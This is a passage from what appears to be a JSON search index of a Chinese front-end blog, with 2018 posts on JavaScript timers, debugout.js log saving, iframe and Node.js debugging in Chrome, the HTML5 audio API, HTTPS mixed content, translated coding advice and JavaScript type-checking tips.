\u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.getElementsByTagName(\u0026#39;tbody\u0026#39;)[0]; var allLines = 10000; // 每次渲染的行数 console.time(\u0026#39;wd\u0026#39;); for(var i=0; i\u0026lt;allLines; i++){ var tr = document.createElement(\u0026#39;tr\u0026#39;); for(var j=0; j\u0026lt;10; j++){ var td = document.createElement(\u0026#39;td\u0026#39;); td.appendChild(document.createTextNode(i+\u0026#39;,\u0026#39;+j)); tr.appendChild(td); } tbody.appendChild(tr); } console.timeEnd(\u0026#39;wd\u0026#39;); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 总共耗时180ms, 浏览器已经给出警告![Violation] 'setTimeout' handler took 53ms。\n1.2. 分批次动态创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.","title":"定时器学习:利用定时器分解耗时任务案例"},{"content":" 我父亲以前跟我说过,有些事物在你得到之前是无足轻重的,得到之后就不可或缺了。微波炉是这样,智能手机是这样,互联网也是这样——老人们在没有互联网的时候过得也很充实。对我来说,函数的柯里化(curry)也是这样。\n然后我继续看了这本书的中文版。有些醍醐灌顶的感觉。 随之在github搜了一下。 我想,即使付费,我也愿意看。\n中文版地址:https://www.gitbook.com/book/llh911001/mostly-adequate-guide-chinese/details github原文地址:https://github.com/MostlyAdequate/mostly-adequate-guide\n1. 后记 其实我是想学点函数柯里化的东西,然后用谷歌搜索了一下。第一个结果就是这本书。非常感谢谷歌搜索,如果我用百度,可能就没有缘分遇到这本书了。\n","permalink":"https://wdd.js.org/posts/2018/02/js-functional-programming/","summary":"我父亲以前跟我说过,有些事物在你得到之前是无足轻重的,得到之后就不可或缺了。微波炉是这样,智能手机是这样,互联网也是这样——老人们在没有互联网的时候过得也很充实。对我来说,函数的柯里化(curry)也是这样。\n然后我继续看了这本书的中文版。有些醍醐灌顶的感觉。 随之在github搜了一下。 我想,即使付费,我也愿意看。\n中文版地址:https://www.gitbook.com/book/llh911001/mostly-adequate-guide-chinese/details github原文地址:https://github.com/MostlyAdequate/mostly-adequate-guide\n1. 后记 其实我是想学点函数柯里化的东西,然后用谷歌搜索了一下。第一个结果就是这本书。非常感谢谷歌搜索,如果我用百度,可能就没有缘分遇到这本书了。","title":"关于JavaScropt函数式编程,我多么希望能早点看到这本书"},{"content":" 本篇文章来自一个需求,前端websocket会收到各种消息,但是调试的时候,我希望把websoekt推送过来的消息都保存到一个文件里,如果出问题的时候,我可以把这些消息的日志文件提交给后端开发区分析错误。但是在浏览器里,js一般是不能写文件的。鼠标另存为的方法也是不太好,因为会保存所有的console.log的输出。于是,终于找到这个debugout.js。\ndebugout.js的原理是将所有日志序列化后,保存到一个变量里。当然这个变量不会无限大,因为默认的最大日志限制是2500行,这个是可配置的。另外,debugout.js也支持在localStorage里存储日志的。\n1. debugout.js 一般来说,可以使用打开console面板,然后右键save,是可以将console.log输出的信息另存为log文件的。但是这就把所有的日志都包含进来了,如何只保存我想要的日志呢?\n(调试输出)从您的日志中生成可以搜索,时间戳,下载等的文本文件。 参见下面的一些例子。\nDebugout的log()接受任何类型的对象,包括函数。 Debugout不是一个猴子补丁,而是一个单独的记录类,你使用而不是控制台。\n调试的一些亮点:\n在运行时或任何时间获取整个日志或尾部 搜索并切片日志 更好地了解可选时间戳的使用模式 在一个地方切换实时日志记录(console.log) 可选地将输出存储在window.localStorage中,并在每个会话中持续添加到同一个日志 可选地,将日志上限为X个最新行以限制内存消耗 下图是使用downloadLog方法下载的日志文件。\n官方提供的demo示例,欢迎试玩。http://inorganik.github.io/debugout.js/\n2. 使用 在脚本顶部的全局命名空间中创建一个新的调试对象,并使用debugout的日志方法替换所有控制台日志方法:\nvar bugout = new debugout(); // instead of console.log(\u0026#39;some object or string\u0026#39;) bugout.log(\u0026#39;some object or string\u0026#39;); 3. API log() -像console.log(), 但是会自动存储 getLog() - 返回所有日志 tail(numLines) - 返回尾部执行行日志,默认100行 search(string) - 搜索日志 getSlice(start, numLines) - 日志切割 downloadLog() - 下载日志 clear() - 清空日志 determineType() - 一个更细粒度的typeof为您提供方便 4. 可选配置 ··· // log in real time (forwards to console.log) self.realTimeLoggingOn = true; // insert a timestamp in front of each log self.useTimestamps = false; // store the output using window.localStorage() and continuously add to the same log each session self.useLocalStorage = false; // set to false after you\u0026rsquo;re done debugging to avoid the log eating up memory self.recordLogs = true; // to avoid the log eating up potentially endless memory self.autoTrim = true; // if autoTrim is true, this many most recent lines are saved self.maxLines = 2500; // how many lines tail() will retrieve self.tailNumLines = 100; // filename of log downloaded with downloadLog() self.logFilename = \u0026rsquo;log.txt\u0026rsquo;; // max recursion depth for logged objects self.maxDepth = 25; ···\n5. 项目地址 https://github.com/inorganik/debugout.js\n6. 另外 我自己也模仿debugout.js写了一个日志保存的项目,该项目可以在ie10及以上下载日志。 debugout.js在ie浏览器上下载日志的方式是有问题的。 项目地址:https://github.com/wangduanduan/log4b.git\n","permalink":"https://wdd.js.org/posts/2018/02/save-console-log-as-file/","summary":"本篇文章来自一个需求,前端websocket会收到各种消息,但是调试的时候,我希望把websoekt推送过来的消息都保存到一个文件里,如果出问题的时候,我可以把这些消息的日志文件提交给后端开发区分析错误。但是在浏览器里,js一般是不能写文件的。鼠标另存为的方法也是不太好,因为会保存所有的console.log的输出。于是,终于找到这个debugout.js。\ndebugout.js的原理是将所有日志序列化后,保存到一个变量里。当然这个变量不会无限大,因为默认的最大日志限制是2500行,这个是可配置的。另外,debugout.js也支持在localStorage里存储日志的。\n1. debugout.js 一般来说,可以使用打开console面板,然后右键save,是可以将console.log输出的信息另存为log文件的。但是这就把所有的日志都包含进来了,如何只保存我想要的日志呢?\n(调试输出)从您的日志中生成可以搜索,时间戳,下载等的文本文件。 参见下面的一些例子。\nDebugout的log()接受任何类型的对象,包括函数。 Debugout不是一个猴子补丁,而是一个单独的记录类,你使用而不是控制台。\n调试的一些亮点:\n在运行时或任何时间获取整个日志或尾部 搜索并切片日志 更好地了解可选时间戳的使用模式 在一个地方切换实时日志记录(console.log) 可选地将输出存储在window.localStorage中,并在每个会话中持续添加到同一个日志 可选地,将日志上限为X个最新行以限制内存消耗 下图是使用downloadLog方法下载的日志文件。\n官方提供的demo示例,欢迎试玩。http://inorganik.github.io/debugout.js/\n2. 使用 在脚本顶部的全局命名空间中创建一个新的调试对象,并使用debugout的日志方法替换所有控制台日志方法:\nvar bugout = new debugout(); // instead of console.log(\u0026#39;some object or string\u0026#39;) bugout.log(\u0026#39;some object or string\u0026#39;); 3. API log() -像console.log(), 但是会自动存储 getLog() - 返回所有日志 tail(numLines) - 返回尾部执行行日志,默认100行 search(string) - 搜索日志 getSlice(start, numLines) - 日志切割 downloadLog() - 下载日志 clear() - 清空日志 determineType() - 一个更细粒度的typeof为您提供方便 4. 可选配置 ··· // log in real time (forwards to console.","title":"终于找到你!如何将前端console.log的日志保存成文件?"},{"content":"之前一直非常痛苦,在iframe外层根本获取不了里面的信息,后来使用了postMessage用传递消息来实现,但是用起来还是非常不方便。\n其实浏览器本身是可以选择不同的iframe的执行环境的。例如有个变量是在iframe里面定义的,你只需要切换到这个iframe的执行环境,你就可以随意操作这个环境的任何变量了。\n这个小技巧,对于调试非常有用,但是我直到今天才发现。\n1. Chrome 这个小箭头可以让你选择不同的iframe的执行环境,可以切换到你的iframe环境里。\n2. IE 如图所示是ie11的dev tool点击下来箭头,也可以选择不同的iframe执行环境。\n3. 其他浏览器 其他浏览器可以自行摸索一下。。。(G_H)\n","permalink":"https://wdd.js.org/posts/2018/02/debug-code-in-iframe/","summary":"之前一直非常痛苦,在iframe外层根本获取不了里面的信息,后来使用了postMessage用传递消息来实现,但是用起来还是非常不方便。\n其实浏览器本身是可以选择不同的iframe的执行环境的。例如有个变量是在iframe里面定义的,你只需要切换到这个iframe的执行环境,你就可以随意操作这个环境的任何变量了。\n这个小技巧,对于调试非常有用,但是我直到今天才发现。\n1. Chrome 这个小箭头可以让你选择不同的iframe的执行环境,可以切换到你的iframe环境里。\n2. IE 如图所示是ie11的dev tool点击下来箭头,也可以选择不同的iframe执行环境。\n3. 其他浏览器 其他浏览器可以自行摸索一下。。。(G_H)","title":"如何浏览器里调试iframe里层的代码?"},{"content":" 我觉得DOM就好像是元素周期表里的元素,JS就好像是实验器材,通过各种化学反应,产生各种魔术。\n1. Audio 通过打开谷歌浏览器的dev tools -\u0026gt; Settings -\u0026gt; Elements -\u0026gt; Show user agent shadow DOM, 你可以看到其实Audio标签也是由常用的 input标签和div等标签合成的。\n2. 基本用法 1 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 2 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; // controlsList属性目前只支持 chrome 58+ 3 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34; controlsList=\u0026#34;nodownload\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 4 \u0026lt;audio controls=\u0026#34;controls\u0026#34;\u0026gt; \u0026lt;source src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; type=\u0026#39;audio/mp3\u0026#39; /\u0026gt; \u0026lt;/audio\u0026gt; 你可以看出他们在Chrome里表现的差异\n关于audio标签支持的音频类型,可以参考Audio#Supported_audio_coding_formats\n3. 常用属性 autoplay: 音频流文件就绪后是否自动播放\npreload: \u0026ldquo;none\u0026rdquo; | \u0026ldquo;metadata\u0026rdquo; | \u0026ldquo;auto\u0026rdquo; | \u0026quot;\u0026quot;\n\u0026ldquo;none\u0026rdquo;: 无需预加载 \u0026ldquo;metadata\u0026rdquo;: 只需要加载元数据,例如音频时长,文件大小等。 \u0026ldquo;auto\u0026rdquo;: 自动优化下载整个流文件 controls: \u0026ldquo;controls\u0026rdquo; | \u0026quot;\u0026quot; 是否需要显示控件\nloop: \u0026ldquo;loop\u0026rdquo; or \u0026quot;\u0026quot; 是否循环播放\nmediagroup: string 多个视频或者音频流是否合并\nsrc: 音频地址\n4. API(重点) load(): 加载资源 play(): 播放 pause(): 暂停 canPlayType(): 询问浏览器以确定是否可以播放给定的MIME类型 buffered():指定文件的缓冲部分的开始和结束时间 5. 常用事件:Media Events(重点) 事件名 何时触发 loadstart 开始加载 progress 正在加载 suspend 用户代理有意无法获取媒体数据,无法获取整个文件 abort 主动终端下载资源并不是由于发生错误 error 获取资源时发生错误 play 开始播放 pause 播放暂停 loadedmetadata 刚获取完元数据 loadeddata 第一次渲染元数据 waiting 等待中 playing 正在播放 canplay 用户代理可以恢复播放媒体数据,但是估计如果现在开始播放,则媒体资源不能以当前播放速率直到其结束呈现,而不必停止进一步缓冲内容。 canplaythrough 用户代理估计,如果现在开始播放,则媒体资源可以以当前播放速率一直呈现到其结束,而不必停止进一步的缓冲。 timeupdate 当前播放位置作为正常播放的一部分而改变,或者以特别有趣的方式,例如不连续地改变。 ended 播放结束 ratechange 媒体播放速度改变 durationchange 媒体时长改变 volumechange 媒体声音大小改变 6. Audio DOM 属性(重点) 6.1. 只读属性 duration: 媒体时长,数值, 单位s ended: 是否完成播放,布尔值 paused: 是否播放暂停,布尔值 6.2. 其他可读写属性(重点) playbackRate: 播放速度,大多数浏览器支持0.5-4, 1表示正常速度,设置该属性可以修改播放速度 volume:0.0-1.0之间,设置该属性可以修改声音大小 muted: 是否静音, 设置该属性可以静音 currentTime:指定播放位置的秒数 // 你可以使用元素的属性seekable来决定媒体目前能查找的范围。它返回一个你可以查找的TimeRanges 时间对象。 var mediaElement = document.getElementById(\u0026#39;mediaElementID\u0026#39;); mediaElement.seekable.start(); // 返回开始时间 (in seconds) mediaElement.seekable.end(); // 返回结束时间 (in seconds) mediaElement.currentTime = 122; // 设定在 122 seconds mediaElement.played.end(); // 返回浏览器播放的秒数 以下方法可以使音频以2倍速度播放。\n\u0026lt;audio id=\u0026#34;wdd\u0026#34; src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;script\u0026gt; var myAudio = document.getElementById(\u0026#39;wdd\u0026#39;); myAudio.playbackRate = 2; \u0026lt;/script\u0026gt; 7. 常见问题及解决方法 录音无法拖动,播放一端就自动停止: https://wenjs.me/p/about-mp3progress-on-audio 如何隐藏Audio的下载按钮:https://segmentfault.com/a/1190000009737051 想找一个简单的录音播放插件: https://github.com/kolber/audiojs 8. 参考资料 W3C: the-audio-element\nwikipedia: HTML5 Audio\nW3C: HTML/Elements/audio\nNative Audio in the browser\nHTMLMediaElement.playbackRate\n使用 HTML5 音频和视频\n","permalink":"https://wdd.js.org/posts/2018/02/audio-heart-detail/","summary":"我觉得DOM就好像是元素周期表里的元素,JS就好像是实验器材,通过各种化学反应,产生各种魔术。\n1. Audio 通过打开谷歌浏览器的dev tools -\u0026gt; Settings -\u0026gt; Elements -\u0026gt; Show user agent shadow DOM, 你可以看到其实Audio标签也是由常用的 input标签和div等标签合成的。\n2. 基本用法 1 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 2 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; // controlsList属性目前只支持 chrome 58+ 3 \u0026lt;audio src=\u0026#34;http://65.ierge.cn/12/186/372266.mp3\u0026#34; controls=\u0026#34;controls\u0026#34; controlsList=\u0026#34;nodownload\u0026#34;\u0026gt; Your browser does not support the audio element. \u0026lt;/audio\u0026gt; \u0026lt;br\u0026gt; 4 \u0026lt;audio controls=\u0026#34;controls\u0026#34;\u0026gt; \u0026lt;source src=\u0026#34;http://65.","title":"Audio 如果你愿意一层一层剥开我的心"},{"content":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/log/conf?token=welljoint\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. HTTPS的默认端口是443,而不是443 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。\n3. 如何快速隐藏一个DOM元素 选中一个元素,然后按h,这时候就会在选中的DOM元素上加上__web-inspector-hide-shortcut__类,这个类会让元素隐藏。谷歌和火狐上都可以,IE上没有试过行不行。\n","permalink":"https://wdd.js.org/posts/2018/02/you-dont-know-https-and-http/","summary":"1. HTTPS域向HTTP域发送请求会被浏览器直接拒绝,HTTP向HTTPS则不会 例如在github pages页面,这是一个https页面,如果在这个页面向http发送请求,那么会直接被浏览器拒绝,并在控制台输出下面的报错信息。\njquery-1.11.3.min.js:5 Mixed Content: The page at \u0026#39;https://wangduanduan.github.io/ddddddd/\u0026#39; was loaded over HTTPS, but requested an insecure XMLHttpRequest endpoint \u0026#39;http://cccccc/log/conf?token=welljoint\u0026#39;. This request has been blocked; the content must be served over HTTPS. 如果你在做第三方集成的系统,如果他们是在浏览器中直接调用你提供的接口,那么最好你使用https协议,这样无论对方是https还是http都可以访问。(相信我,这个很重要,我曾经经历过上线后遇到这个问题,然后连夜申请证书,把http升级到https的痛苦经历)\n2. HTTPS的默认端口是443,而不是443 如果443端口已经被其他服务占用了,那么使用其他任何没有被占用的端口都可以用作HTTPS服务,只不过在请求的时候需要加上端口号罢了。\n3. 如何快速隐藏一个DOM元素 选中一个元素,然后按h,这时候就会在选中的DOM元素上加上__web-inspector-hide-shortcut__类,这个类会让元素隐藏。谷歌和火狐上都可以,IE上没有试过行不行。","title":"可能被遗漏的https与http的知识点"},{"content":"英文好的,直接看原文\nhttps://blog.hospodarets.com/nodejs-debugging-in-chrome-devtools\n1. 要求 Node.js 6.3+ Chrome 55+ 2. 操作步骤 1 打开连接 chrome://flags/#enable-devtools-experiments 2 开启开发者工具实验性功能 3 重启浏览器 4 打开 DevTools Setting -\u0026gt; Experiments tab 5 按6次shift后,隐藏的功能会出现,勾选\u0026quot;Node debugging\u0026quot; 3. 运行程序 必须要有 --inspect\n\u0026gt; node --inspect www Debugger listening on port 9229. Warning: This is an experimental feature and could change at any time. To start debugging, open the following URL in Chrome: chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf 将这个地址粘贴到谷歌浏览器:chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf\n程序后端输出的日志也回输出到谷歌浏览器的console里面,同时也可以在Sources里进行断点调试了。 ","permalink":"https://wdd.js.org/posts/2018/02/debug-nodejs-in-chrome-devtool/","summary":"英文好的,直接看原文\nhttps://blog.hospodarets.com/nodejs-debugging-in-chrome-devtools\n1. 要求 Node.js 6.3+ Chrome 55+ 2. 操作步骤 1 打开连接 chrome://flags/#enable-devtools-experiments 2 开启开发者工具实验性功能 3 重启浏览器 4 打开 DevTools Setting -\u0026gt; Experiments tab 5 按6次shift后,隐藏的功能会出现,勾选\u0026quot;Node debugging\u0026quot; 3. 运行程序 必须要有 --inspect\n\u0026gt; node --inspect www Debugger listening on port 9229. Warning: This is an experimental feature and could change at any time. To start debugging, open the following URL in Chrome: chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf 将这个地址粘贴到谷歌浏览器:chrome-devtools://devtools/remote/serve_file/@60cd6e859b9f557d2312f5bf532f6aec5f284980/inspector.html?experiments=true\u0026amp;v8only=true\u0026amp;ws=localhost:9229/78a884f4-8c2e-459e-93f7-e1cbe87cf5cf\n程序后端输出的日志也回输出到谷歌浏览器的console里面,同时也可以在Sources里进行断点调试了。 ","title":"直接在Chrome DevTools调试Node.js"},{"content":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编​​写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。 如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。 编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。 在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。 微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也以是坏的。 您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码分析和预测之前,您的客户/客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是腰部时间和资源对不合理的愿望和牺牲与质量。\n11. 自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟* 5天* 21天* 12个月= 6 300分钟= 105小时= 13.125天〜5250 $。 如果你有40 000名员工,这将需要多少费用?\n12. 出去浪,学习新爱好 差异化工作可以增加心智能力,并提供新想法。所以,暂停现在的工作,出去呼吸一下新鲜空气,与朋友交谈,弹吉他等。 ps: 莫春者,春服既成,冠者五六人,童子六七人,浴乎沂,风乎舞雩,咏而归。------《论语.先进》。\n13. 在空闲时间学习新事物 当人们停止学习时,他们开始退化。\n","permalink":"https://wdd.js.org/posts/2018/02/few-simple-rules-for-good-coding-my-15-years-experience/","summary":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编​​写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。 如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。 编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。 在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。 微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也以是坏的。 您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码分析和预测之前,您的客户/客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是腰部时间和资源对不合理的愿望和牺牲与质量。\n11. 自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟* 5天* 21天* 12个月= 6 300分钟= 105小时= 13.","title":"【译】13简单的优秀编码规则(从我15年的经验)"},{"content":"0.1. 安全类型检测 javascript内置类型检测并不可靠 safari某些版本(\u0026lt;4)typeof正则表达式返回为function 建议使用Object.prototype.toString.call()方法检测数据类型\nfunction isArray(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Array]\u0026#34;; } function isFunction(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Function]\u0026#34;; } function isRegExp(value){ return Object.prototype.toString.call(value) === \u0026#34;[object RegExp]\u0026#34;; } function isNativeJSON(){ return window.JSON \u0026amp;\u0026amp; Object.prototype.toString.call(JSON) === \u0026#34;[object JSON]\u0026#34;; } 对于ie中一COM对象形式实现的任何函数,isFunction都返回false,因为他们并非原生的javascript函数。\n在web开发中,能够区分原生与非原生的对象非常重要。只有这样才能确切知道某个对象是否有哪些功能\n以上所有的正确性的前提是:Object.prototype.toString没有被修改过\n0.2. 作用域安全的构造函数 function Person(name){ this.name = name; } //使用new来创建一个对象 var one = new Person(\u0026#39;wdd\u0026#39;); //直接调用构造函数 Person(); 由于this是运行时分配的,如果你使用new来操作,this指向的就是one。如果直接调用构造函数,那么this会指向全局对象window,然后你的代码就会覆盖window的原生name。如果有其他地方使用过window.name, 那么你的函数将会埋下一个深藏的bug。\n==那么,如何才能创建一个作用域安全的构造函数?== 方法1\nfunction Person(name){ if(this instanceof Person){ this.name = name; } else{ return new Person(name); } } 1. 惰性载入函数 假设有一个方法X,在A类浏览器里叫A,在b类浏览器里叫B,有些浏览器并没有这个方法,你想实现一个跨浏览器的方法。\n惰性载入函数的思想是:在函数内部改变函数自身的执行逻辑\nfunction X(){ if(A){ return new A(); } else{ if(B){ return new B(); } else{ throw new Error(\u0026#39;no A or B\u0026#39;); } } } 换一种写法\nfunction X(){ if(A){ X = function(){ return new A(); }; } else{ if(B){ X = function(){ return new B(); }; } else{ throw new Error(\u0026#39;no A or B\u0026#39;); } } return new X(); } 2. 防篡改对象 2.1. 不可扩展对象 Object.preventExtensions // 下面代码在谷歌浏览器中执行 \u0026gt; var person = {name: 